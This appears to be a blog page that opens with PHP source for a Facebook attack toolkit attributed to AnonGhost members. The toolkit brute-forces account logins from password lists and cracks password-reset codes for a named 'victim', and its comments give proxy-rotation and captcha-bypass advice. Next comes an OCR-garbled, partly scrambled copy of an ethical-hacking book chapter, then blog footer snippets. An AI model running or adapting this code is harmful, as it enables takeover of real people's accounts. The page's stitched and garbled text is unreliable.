$rsss = str_replace("https://id-id.facebook.com/","",$result);
}
elseif($country == "site:ru-ru.facebook.com/"){
$rsss = str_replace("https://ru-ru.facebook.com/","",$result);
}
elseif($country == "site:nl-nl.facebook.com/"){
$rsss = str_replace("https://nl-nl.facebook.com/","",$result);
}
elseif($country == "site:bg-bg.facebook.com/"){
$rsss = str_replace("https://bg-bg.facebook.com/","",$result);
}
elseif($country == "site:mk-mk.facebook.com/"){
$rsss = str_replace("https://mk-mk.facebook.com/","",$result);
}
elseif($country == "site:uk-ua.facebook.com/"){
$rsss = str_replace("https://uk-ua.facebook.com/","",$result);
}
$users = explode("?", $rsss);
$users = $users[0];
//Bruteforce Function
foreach($password as $pass)
{
echo brute($users,$pass);
}
}
}
}
@system("del cookie.txt"); //Delete cookies command for win server.
@system("rm cookie.txt"); // Delete cookies command for linux server.
}
if(isset($_GET['action']) && $_GET['action'] == 'baipas'){
ob_start();
@set_time_limit(0);
#################################################
#---------------------------------------------- #
# Facebook Brute Force 2014 #
#Coded by : Mauritania Attacker&Noname-Haxor #
#Greetz : All AnonGhost Members #
#This Tool Is For Erasing Israel in Fb #
# --------------------------------------------- #
#################################################
echo "
<head>
<link rel='icon' type='image/ico' href='http://media.stateofq.com/photologue/photos/cache/facebook%20favicon_thumbnail.png'/>
<form method='POST'>
<title>Facebook Brute Force 2014</title>
</head>
<style>
textarea {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
}
input {
color: ##33CCFF;
border:1px dotted #33CCFF;
}
</style>";
echo "
<body text='#FFFFFF' >
<center><font color='White' size=4 face='impact' >Facebook Multi-Account BruteForce by Mauritania Attacker&Noname-Haxor </center></font><br>
<p dir='ltr' align='center'>
<textarea cols='22' class='area' placeholder='Username' rows='14' name='username'></textarea>
<textarea cols='22' class='area' placeholder='Password' rows='14' name='password'></textarea><br>
<br>
<input type='submit' name='scan' value='Start BruteForce'><br></p>";
if(isset($_POST['scan'])){
#To Put Proxy SOCKS V5
//curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
//curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
function brute($user,$pass){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/login.php?login_attempt=1");
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, "email={$user}&pass={$pass}");
curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/36.0.1985.125");
$login = curl_exec($ch);
//print_r($login);
$check = (eregi('class="s t i u"',$login)) ? true:false;
if($check == true){
echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>Not the right one :( || Username : <font color='red'>$user</font> Password : <font color='red'>$pass</font></font></p>";
}else{
echo "<p align='center' dir='ltr'><font face='Arial Black' size='2'>This Password Seems Working !Try It ^_^ || Username: <font color='green'>$user</font> Password : <font color='green'>$pass</font></font></p>";
}
}
$username = explode("\n", $_POST['username']);
$password = explode("\n", $_POST['password']);
foreach($username as $users) {
$users = @trim($users);
foreach($password as $pass) {
$pass = @trim($pass);
echo brute($users,$pass);
}
}
@system("del cookie.txt"); //Delete cookies command for win server.
@system("rm cookie.txt"); // Delete cookies command for linux server.
}
echo"<br>
<br>
<br>
<br>
";
}
if(isset($_GET['action']) && $_GET['action'] == 'crack'){
/*
[+] Facebook Code Security Cracker
[+] Coded By : Mauritania Attacker
[+] GreetZ : All AnonGhost MemberZ
[+] FuCk Priv888888888888888888888
~~HACKING IS ART OF EXPLOITATION~~
<3 <3 <3 I'm not educated , I hate school , Hacking is my life xD !!!!!!!!!!!!!!!!!!!!!!!!!! <3 <3 <3
// How to use: Restore your victim account and better choose the email option :p , and the rest is to use your mind \!/
I suggest you to use an auto rotating proxy after each 2 minutes so you won't get banned :D , i've bypassed already the captcha
security and cookies ,so facebook won't let you try many attempts so proxy is the solution !
you still can add a proxy socks v5 option in Curl only two lines :
curl_setopt($ch, CURLOPT_PROXY, "proxy:port");
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
You can edit my script and try to develop it more if you have some ideas you are free , but don't forget the Copyright wkwkwkwkwkwk xd <3
Sharing is Caring \!/
Sorry my english is bad and i'm lazy xD !
*/
@set_time_limit(0);
echo "<form method='POST'>
<title>Facebook Code Security Cracker > By Mauritania Attacker</title>
<style>
/* Rounded Corners */
#ghost {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
height: 250px;
width: 200px; }
input {
/* INPUTS */
border: 1px solid #12549c;
}
</style>
<center><font color='White' size='4' face='impact'>Facebook 0day Exploit Reset Code Priv8 By Mauritania Attacker</center><br>
<center><input type='text' name='target' placeholder='Victim'></center><br>
<center><textarea cols='10' rows='6' id='ghost' placeholder='Reset Codes' name='code'></textarea><br></center>
<p><center><input type='submit' value='Crack Reset Code' name='scan'><br><br></center></p>
</form>";
$target=$_POST['target'];
$user = explode("\r\n", $_POST['code']);
if($_POST['scan'])
{
foreach($user as $code)
{
// Curl Function ^_^
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://m.facebook.com/recover/password?u={$target}&n={$code}");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114"); // change this with your real useragent infos (browser & version)
$check = curl_exec($ch);
if(eregi("password_new", $check)) //Keyword Good Response ^_^
{
echo "<font face='Tahoma' size='2' color='green'>{$code} => Facebook Confirmation Code Found ^_^ </font><br>";
}
else
{
echo "<font face='Tahoma' size='2' color='red'>{$code} => Incorrect Code Trying More...</font><br>";
}
curl_close($ch);
}
}
@system("del cookie.txt"); //Delete cookies command for win server.
@system("rm cookie.txt"); // Delete cookies command for linux server.
}
echo "</center><center>";
ob_end_flush();
echo '<center><font color="red" face="arial" size="2" align="">Coded By Mauritania Attacker & n0name-hax0r</font></center>';
if(isset($_GET['action']) && $_GET['action'] == 'graph'){
@set_time_limit(0);
echo "<form method='POST'>
<title>Facebook ID's Checker By Mauritania Attacker</title>
<style>
/* Rounded Corners */
#ghost {
resize:none;
color: #1975FF ;
border:1px solid #1975FF ;
border-left: 4px solid #1975FF ;
height: 250px;
width: 200px; }
input {
/* INPUTS */
border: 1px solid #12549c;
}
</style>
<center><font color='White' size='4' face='impact'>Facebook ID's Checker By Mauritania Attacker</center><br>
<center><textarea cols='10' rows='6' id='ghost' placeholder='ID Here ^^' name='code'></textarea><br></center>
<p><center><input type='submit' value='Check Now' name='scan'><br><br></center></p>
</form>";
$user = explode("\r\n", $_POST['code']);
if($_POST['scan'])
{
foreach($user as $code)
{
// Curl Function ^_^
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://graph.facebook.com/{$code}");
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Chrome/35.0.1916.114");
$check = curl_exec($ch);
if(eregi("username", $check)) //Keyword Good Response ^_^
{
echo "<font face='Tahoma' size='2' color='green'>{$code} => ID IS CORRECT ^_^ </font><br>";
}
else
{
echo "<font face='Tahoma' size='2' color='red'>{$code} => ID IS FALSE :(...</font><br>";
}
curl_close($ch);
}
}
@system("del cookie.txt"); //Delete cookies command for win server.
@system("rm cookie.txt"); // Delete cookies command for linux server.
}
echo "</center><center>";
ob_end_flush();
echo '<center><font color="red" face="arial" size="2" align="">Coded By Mauritania Attacker & n0name-hax0r</font></center>';
?>
Introduction to Ethical Hacking
Chapter 1 Introduction to Ethical Hacking
In This Chapter
L
▶ Understanding hacker objectives ▶ Outlining the differences between ethical hackers and malicious hackers ▶ Examining how the ethical hacking process has come about ▶ Understanding the dangers that your computer systems face ▶ Starting the ethical hacking process
T his ers find Although Webster the professional before book and dictionary ethical the network is bad about security is an guys defines for hacking often security get testing ethical H
overused a ethically chance T
techniques vulnerabilities E perfectly D and to — M exploit the misunderstood for A that science T the and them. I E R I A
of testing your comput- plugging the holes you
word, the Merriam-
to perform sion in accepted the has introduction.
all been professional the obtained tests R
covered I
by standards G
the of conduct. in this book owner(s) of context of this book and
cover — that is, conforming IT practitioners are obligated to
How Hackers We’ve all C heard O
P of Y Beget hackers. Many Ethical of us have aboveboard the even systems Hackers
suffered — and hence the only consequences the after disclaimer
permis-
of hacker actions. So who are these hackers? Why is it important to know about them? The next few sections give you the lowdown on hackers.
Defining hacker
Hacker is a word that has two meanings:
✔ Traditionally, a hacker is someone who likes to tinker with software or
electronic systems. Hackers enjoy exploring and learning how computer systems operate. They love discovering new ways to work electronically.
10
Part I: Building the Foundation for Ethical Hacking
✔ Recently, hacker has taken on a new meaning — someone who maliciously
breaks into systems for personal gain. Technically, these criminals are crackers (criminal hackers). Crackers break into (crack) systems with malicious intent. They are out for personal gain: fame, profit, and even revenge. They modify, delete, and steal critical information, often making other people miserable.
The good-guy (white-hat) hackers don’t like being in the same category as the bad-guy (black-hat) hackers. (These terms come from Western movies where the good guys wore white cowboy hats and the bad guys wore black cowboy hats.) Whatever the case, most people give hacker a negative connotation.
Many malicious hackers claim that they don’t cause damage but instead are altruistically helping others. Yeah, right. Many malicious hackers are elec- tronic thieves.
In this book, I use the following terminology:
✔ Hackers (or bad guys) try to compromise computers.
✔ Ethical hackers (or good guys) protect computers against illicit entry.
Hackers go for almost any system they think they can compromise. Some prefer prestigious, well-protected systems, but hacking into anyone’s system increases their status in hacker circles.
Ethical Hacking 101
You need protection from hacker shenanigans. An ethical hacker possesses the skills, mindset, and tools of a hacker but is also trustworthy. Ethical hack- ers perform the hacks as security tests for their systems.
If you perform ethical hacking tests for customers or simply want to add another certification to your credentials, you may want to consider the ethi- cal hacker certification Certified Ethical Hacker, which is sponsored by EC- Council. See www.eccouncil.org/CEH.htm for more information.
Ethical hacking — also known as penetration testing or white-hat hacking — involves the same tools, tricks, and techniques that hackers use, but with one major difference: Ethical hacking is legal. Ethical hacking is performed with the target’s permission. The intent of ethical hacking is to discover vulnera- bilities from a hacker’s viewpoint so systems can be better secured. It’s part of an overall information risk management program that allows for ongoing security improvements. Ethical hacking can also ensure that vendors’ claims about the security of their products are legitimate.
To hack your own systems like the bad guys, you must think like they think. It’s absolutely critical to know your enemy; see Chapter 2 for details.
Understanding the Need to Hack Your Own Systems
To catch a thief, think like a thief. That’s the basis for ethical hacking.
The law of averages works against security. With the increased numbers and expanding knowledge of hackers combined with the growing number of system vulnerabilities and other unknowns, the time will come when all computer systems are hacked or compromised in some way. Protecting your systems from the bad guys — and not just the generic vulnerabilities that everyone knows about — is absolutely critical. When you know hacker tricks, you can see how vulnerable your systems are.
Hacking preys on weak security practices and undisclosed vulnerabilities. Firewalls, encryption, and virtual private networks (VPNs) can create a false feeling of safety. These security systems often focus on high-level vulnerabili- ties, such as viruses and traffic through a firewall, without affecting how hack- ers work. Attacking your own systems to discover vulnerabilities is a step to making them more secure. This is the only proven method of greatly hardening your systems from attack. If you don’t identify weaknesses, it’s a matter of time before the vulnerabilities are exploited.
As hackers expand their knowledge, so should you. You must think like them to protect your systems from them. You, as the ethical hacker, must know activities hackers carry out and how to stop their efforts. You should know what to look for and how to use that information to thwart hackers’ efforts.
You don’t have to protect your systems from everything. You can’t. The only protection against everything is to unplug your computer systems and lock them away so no one can touch them — not even you. That’s not the best approach to information security. What’s important is to protect your sys- tems from known vulnerabilities and common hacker attacks.
It’s impossible to buttress all possible vulnerabilities on all your systems. You can’t plan for all possible attacks — especially the ones that are currently unknown. However, the more combinations you try — the more you test whole systems instead of individual units — the better your chances of discovering vulnerabilities that affect everything as a whole.
Don’t take ethical hacking too far, though. It makes little sense to harden your systems from unlikely attacks. For instance, if you don’t have a lot of foot traffic
11 Chapter 1: Introduction to Ethical Hacking
12
Part I: Building the Foundation for Ethical Hacking
in your office and no internal Web server running, you may not have as much to worry about as an Internet hosting provider would have. However, don’t forget about insider threats from malicious employees!
Your overall goals as an ethical hacker should be as follows:
✔ Hack your systems in a nondestructive fashion.
✔ Enumerate vulnerabilities and, if necessary, prove to upper management
that vulnerabilities exist.
✔ Apply results to remove vulnerabilities and better secure your systems.
Understanding the Dangers Your Systems Face
It’s one thing to know that your systems generally are under fire from hackers around the world. It’s another to understand specific attacks against your sys- tems that are possible. This section offers some well-known attacks but is by no means a comprehensive listing. That requires its own book: Hack Attacks Encyclopedia, by John Chirillo (Wiley Publishing, Inc.).
Many information-security vulnerabilities aren’t critical by themselves. However, exploiting several vulnerabilities at the same time can take its toll. For example, a default Windows OS configuration, a weak SQL Server admin- istrator password, and a server hosted on a wireless network may not be major security concerns separately. But exploiting all three of these vulnera- bilities at the same time can be a serious issue.
Nontechnical attacks
Exploits that involve manipulating people — end users and even yourself — are the greatest vulnerability within any computer or network infrastructure. Humans are trusting by nature, which can lead to social-engineering exploits. Social engineering is defined as the exploitation of the trusting nature of human beings to gain information for malicious purposes. I cover social engineering in depth in Chapter 5.
Other common and effective attacks against information systems are physical. Hackers break into buildings, computer rooms, or other areas containing crit- ical information or property. Physical attacks can include dumpster diving (rummaging through trash cans and dumpsters for intellectual property, passwords, network diagrams, and other information).
Network-infrastructure attacks
Hacker attacks against network infrastructures can be easy, because many networks can be reached from anywhere in the world via the Internet. Here are some examples of network-infrastructure attacks:
✔ Connecting into a network through a rogue modem attached to a
computer behind a firewall
✔ Exploiting weaknesses in network transport mechanisms, such as TCP/IP
and NetBIOS
✔ Flooding a network with too many requests, creating a denial of service
(DoS) for legitimate requests
✔ Installing a network analyzer on a network and capturing every packet that travels across it, revealing confidential information in clear text
✔ Piggybacking onto a network through an insecure 802.11b wireless
configuration
Operating-system attacks
Hacking operating systems (OSs) is a preferred method of the bad guys. OSs comprise a large portion of hacker attacks simply because every computer has one and so many well-known exploits can be used against them.
Occasionally, some operating systems that are more secure out of the box — such as Novell NetWare and the flavors of BSD UNIX — are attacked, and vulnerabilities turn up. But hackers prefer attacking operating systems like Windows and Linux because they are widely used and better known for their vulnerabilities.
Here are some examples of attacks on operating systems:
✔ Exploiting specific protocol implementations
✔ Attacking built-in authentication systems
✔ Breaking file-system security
✔ Cracking passwords and encryption mechanisms
Application and other specialized attacks
Applications take a lot of hits by hackers. Programs such as e-mail server software and Web applications often are beaten down:
13 Chapter 1: Introduction to Ethical Hacking
14
Part I: Building the Foundation for Ethical Hacking
✔ Hypertext Transfer Protocol (HTTP) and Simple Mail Transfer Protocol
(SMTP) applications are frequently attacked because most firewalls and other security mechanisms are configured to allow full access to these programs from the Internet.
✔ Malicious software (malware) includes viruses, worms, Trojan horses,
and spyware. Malware clogs networks and takes down systems.
✔ Spam (junk e-mail) is wreaking havoc on system availability and storage
space. And it can carry malware.
Ethical hacking helps reveal such attacks against your computer systems. Parts II through V of this book cover these attacks in detail, along with spe- cific countermeasures you can implement against attacks on your systems.
Obeying the Ethical Hacking Commandments
Every ethical hacker must abide by a few basic commandments. If not, bad things can happen. I’ve seen these commandments ignored or forgotten when planning or executing ethical hacking tests. The results weren’t positive.
Working ethically
The word ethical in this context can be defined as working with high profes- sional morals and principles. Whether you’re performing ethical hacking tests against your own systems or for someone who has hired you, everything you do as an ethical hacker must be aboveboard and must support the company’s goals. No hidden agendas are allowed!
Trustworthiness is the ultimate tenet. The misuse of information is absolutely forbidden. That’s what the bad guys do.
Respecting privacy
Treat the information you gather with the utmost respect. All information you obtain during your testing — from Web-application log files to clear-text passwords — must be kept private. Don’t use this information to snoop into confidential corporate information or private lives. If you sense that someone should know there’s a problem, consider sharing that information with the appropriate manager.
Involve others in your process. This is a “watch the watcher” system that can build trust and support your ethical hacking projects.
Not crashing your systems
One of the biggest mistakes I’ve seen when people try to hack their own sys- tems is inadvertently crashing their systems. The main reason for this is poor planning. These testers have not read the documentation or misunderstand the usage and power of the security tools and techniques.
You can easily create DoS conditions on your systems when testing. Running too many tests too quickly on a system causes many system lockups. I know because I’ve done this! Don’t rush things and assume that a network or spe- cific host can handle the beating that network scanners and vulnerability- assessment tools can dish out.
Many security-assessment tools can control how many tests are performed on a system at the same time. These tools are especially handy if you need to run the tests on production systems during regular business hours.
You can even create an account or system lockout condition by social engi- neering someone into changing a password, not realizing that doing so might create a system lockout condition.
The Ethical Hacking Process
Like practically any IT or security project, ethical hacking needs to be planned in advance. Strategic and tactical issues in the ethical hacking process should be determined and agreed upon. Planning is important for any amount of testing — from a simple password-cracking test to an all-out penetration test on a Web application.
Formulating your plan
Approval for ethical hacking is essential. Make what you’re doing known and visible — at least to the decision makers. Obtaining sponsorship of the project is the first step. This could be your manager, an executive, a customer, or even yourself if you’re the boss. You need someone to back you up and sign off on your plan. Otherwise, your testing may be called off unexpectedly if someone claims they never authorized you to perform the tests.
15 Chapter 1: Introduction to Ethical Hacking
16
Part I: Building the Foundation for Ethical Hacking
The authorization can be as simple as an internal memo from your boss if you’re performing these tests on your own systems. If you’re testing for a customer, have a signed contract in place, stating the customer’s support and authorization. Get written approval on this sponsorship as soon as possible to ensure that none of your time or effort is wasted. This documentation is your Get Out of Jail Free card if anyone questions what you’re doing.
You need a detailed plan, but that doesn’t mean you have to have volumes of testing procedures. One slip can crash your systems — not necessarily what anyone wants. A well-defined scope includes the following information:
✔ Specific systems to be tested
✔ Risks that are involved
✔ When the tests are performed and your overall timeline
✔ How the tests are performed
✔ How much knowledge of the systems you have before you start testing
✔ What is done when a major vulnerability is discovered
✔ The specific deliverables — this includes security-assessment reports and a higher-level report outlining the general vulnerabilities to be addressed, along with countermeasures that should be implemented
When selecting systems to test, start with the most critical or vulnerable systems. For instance, you can test computer passwords or attempt social- engineering attacks before drilling down into more detailed systems.
It pays to have a contingency plan for your ethical hacking process in case something goes awry. What if you’re assessing your firewall or Web applica- tion, and you take it down? This can cause system unavailability, which can reduce system performance or employee productivity. Even worse, it could cause loss of data integrity, loss of data, and bad publicity.
Handle social-engineering and denial-of-service attacks carefully. Determine how they can affect the systems you’re testing and your entire organization.
Determining when the tests are performed is something that you must think long and hard about. Do you test during normal business hours? How about late at night or early in the morning so that production systems aren’t affected? Involve others to make sure they approve of your timing.
The best approach is an unlimited attack, wherein any type of test is possi- ble. The bad guys aren’t hacking your systems within a limited scope, so why should you? Some exceptions to this approach are performing DoS, social- engineering, and physical-security tests.
Don’t stop with one security hole. This can lead to a false sense of security. Keep going to see what else you can discover. I’m not saying to keep hacking
until the end of time or until you crash all your systems. Simply pursue the path you’re going down until you can’t hack it any longer (pun intended).
One of your goals may be to perform the tests without being detected. For example, you may be performing your tests on remote systems or on a remote office, and you don’t want the users to be aware of what you’re doing. Other- wise, the users may be on to you and be on their best behavior.
You don’t need extensive knowledge of the systems you’re testing — just a basic understanding. This will help you protect the tested systems.
Understanding the systems you’re testing shouldn’t be difficult if you’re hack- ing your own in-house systems. If you’re hacking a customer’s systems, you may have to dig deeper. In fact, I’ve never had a customer ask for a fully blind assessment. Most people are scared of these assessments. Base the type of test you will perform on your organization’s or customer’s needs.
Chapter 19 covers hiring “reformed” hackers.
Selecting tools
As with any project, if you don’t have the right tools for ethical hacking, accom- plishing the task effectively is difficult. Having said that, just because you use the right tools doesn’t mean that you will discover all vulnerabilities.
Know the personal and technical limitations. Many security-assessment tools generate false positives and negatives (incorrectly identifying vulnerabilities). Others may miss vulnerabilities. If you’re performing tests such as social- engineering or physical-security assessments, you may miss weaknesses.
Many tools focus on specific tests, but no one tool can test for everything. For the same reason that you wouldn’t drive in a nail with a screwdriver, you shouldn’t use a word processor to scan your network for open ports. This is why you need a set of specific tools that you can call on for the task at hand. The more tools you have, the easier your ethical hacking efforts are.
Make sure you that you’re using the right tool for the task:
✔ To crack passwords, you need a cracking tool such as LC4, John the
Ripper, or pwdump.
A general port scanner, such as SuperScan, may not crack passwords.
✔ For an in-depth analysis of a Web application, a Web-application assess-
ment tool (such as Whisker or WebInspect) is more appropriate than a network analyzer (such as Ethereal).
17 Chapter 1: Introduction to Ethical Hacking
18
Part I: Building the Foundation for Ethical Hacking
When selecting the right security tool for the task, ask around. Get advice from your colleagues and from other people online. A simple Groups search on Google (www.google.com) or perusal of security portals, such as SecurityFocus.com, SearchSecurity.com, and ITsecurity.com, often produces great feedback from other security experts.
Hundreds, if not thousands, of tools can be used for ethical hacking — from your own words and actions to software-based vulnerability-assessment pro- grams to hardware-based network analyzers. The following list runs down some of my favorite commercial, freeware, and open-source security tools:
✔ Nmap
✔ EtherPeek
✔ SuperScan
✔ QualysGuard
✔ WebInspect
✔ LC4 (formerly called L0phtcrack)
✔ LANguard Network Security Scanner
✔ Network Stumbler
✔ ToneLoc
Here are some other popular tools:
✔ Internet Scanner
✔ Ethereal
✔ Nessus
✔ Nikto
✔ Kismet
✔ THC-Scan
I discuss these tools and many others in Parts II through V when I go into the specific hack attacks. Appendix A contains a more comprehensive listing of these tools for your reference.
The capabilities of many security and hacking tools are often misunderstood. This misunderstanding has shed negative light on some excellent tools, such as SATAN (Security Administrator Tool for Analyzing Networks) and Nmap (Network Mapper).
Some of these tools are complex. Whichever tools you use, familiarize yourself with them before you start using them. Here are ways to do that:
✔ Read the readme and/or online help files for your tools.
✔ Study the user’s guide for your commercial tools.
✔ Consider formal classroom training from the security-tool vendor or
another third-party training provider, if available.
Look for these characteristics in tools for ethical hacking:
✔ Adequate documentation.
✔ Detailed reports on the discovered vulnerabilities, including how they
may be exploited and fixed.
✔ Updates and support when needed.
✔ High-level reports that can be presented to managers or nontechie types.
These features can save you time and effort when you’re writing the report.
Executing the plan
Ethical hacking can take persistence. Time and patience are important. Be careful when you’re performing your ethical hacking tests. A hacker in your network or a seemingly benign employee looking over your shoulder may watch what’s going on. This person could use this information against you.
It’s not practical to make sure that no hackers are on your systems before you start. Just make sure you keep everything as quiet and private as possi- ble. This is especially critical when transmitting and storing your test results. If possible, encrypt these e-mails and files using Pretty Good Privacy (PGP) or something similar. At a minimum, password-protect them.
You’re now on a reconnaissance mission. Harness as much information as possible about your organization and systems, which is what malicious hack- ers do. Start with a broad view and narrow your focus:
1. Search the Internet for your organization’s name, your computer and
network system names, and your IP addresses.
Google is a great place to start for this.
2. Narrow your scope, targeting the specific systems you’re testing.
Whether physical-security structures or Web applications, a casual assessment can turn up much information about your systems.
3. Further narrow your focus with a more critical eye. Perform actual
scans and other detailed tests on your systems.
4. Perform the attacks, if that’s what you choose to do.
19 Chapter 1: Introduction to Ethical Hacking
20
Part I: Building the Foundation for Ethical Hacking
Evaluating results
Assess your results to see what you uncovered, assuming that the vulnerabil- ities haven’t been made obvious before now. This is where knowledge counts. Evaluating the results and correlating the specific vulnerabilities discovered is a skill that gets better with experience. You’ll end up knowing your systems as well as anyone else. This makes the evaluation process much simpler moving forward.
Submit a formal report to upper management or to your customer, outlining your results. Keep these other parties in the loop to show that your efforts and their money are well spent. Chapter 17 describes this process.
Moving on
When you’ve finished your ethical hacking tests, you still need to implement your analysis and recommendations to make sure your systems are secure.
New security vulnerabilities continually appear. Information systems con- stantly change and become more complex. New hacker exploits and security vulnerabilities are regularly uncovered. You may discover new ones! Security tests are a snapshot of the security posture of your systems. At any time, everything can change, especially after software upgrades, adding computer systems, or applying patches. Plan to test regularly (for example, once a week or once a month). Chapter 19 covers managing security changes.
Subscribe to:
Posts (Atom)
Statistics Help Online
Are you a college student taking a statistics course and interested in getting help online ? We provide stats help in areas related to resea...
-
How To Get a Background Check and Credit Report on ANYONE ! Links and Method working as of publication – Febuary 8, 2015 Having this info...